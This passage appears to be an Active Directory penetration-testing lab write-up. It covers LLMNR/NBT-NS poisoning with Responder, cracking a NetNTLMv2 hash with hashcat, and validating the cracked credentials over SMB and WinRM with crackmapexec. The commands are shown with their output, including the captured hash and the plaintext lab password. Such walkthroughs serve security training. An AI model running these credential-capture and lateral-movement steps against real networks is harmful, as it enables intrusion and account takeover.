Foothold
After the enumeration we know the hosts and DC. We also have some valid usernames.
Responder
We use Responder to perform LLMNR/NBT-NS poisoning and capture NetNTLMv2 hashes. After that we use hashcat (mode 5600) to crack the captured hash:
hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt
<SNIP>
AB920::INLANEFREIGHT:2b90f498f617619c:268ab3710df6a46b2296082138e083ed:010100000000000080807217bc4dd80198a9fd96af791551000000000200080036004a004500310001001e00570049004e002d00500049004d003500300048005300500046004a00530004003400570049004e002d00500049004d003500300048005300500046004a0053002e0036004a00450031002e004c004f00430041004c000300140036004a00450031002e004c004f00430041004c000500140036004a00450031002e004c004f00430041004c000700080080807217bc4dd80106000400020000000800300030000000000000000000000000200000c2ef82380450c5c35e0a85fdd7ec2c1b4d7467db93379e10636aa575b9984c570a0010000000000000000000000000000000000009002e0063006900660073002f0049004e004c0041004e0045004600520049004700480054002e004c004f00430041004c00000000000000000000000000:weasal

Now we know the creds and have a foothold. Let's see if we can access any computers using the services available to our user. First, let's try SMB:
crackmapexec smb 172.16.7.50 -u 'AB920' -p 'weasal'
[*] First time use detected
[*] Creating home directory structure
[*] Creating default workspace
[*] Initializing LDAP protocol database
[*] Initializing MSSQL protocol database
[*] Initializing SMB protocol database
[*] Initializing SSH protocol database
[*] Initializing WINRM protocol database
[*] Copying default configuration file
[*] Generating SSL certificate
SMB 172.16.7.50 445 MS01 [*] Windows 10.0 Build 17763 x64 (name:MS01) (domain:INLANEFREIGHT.LOCAL) (signing:False) (SMBv1:False)
SMB 172.16.7.50 445 MS01 [+] INLANEFREIGHT.LOCAL\AB920:weasal
The credentials are accepted over SMB, but we don't get anything more than that. So let's try WinRM now:
And this time we see (Pwn3d!).
So with these creds, let's log in to MS01 using evil-winrm.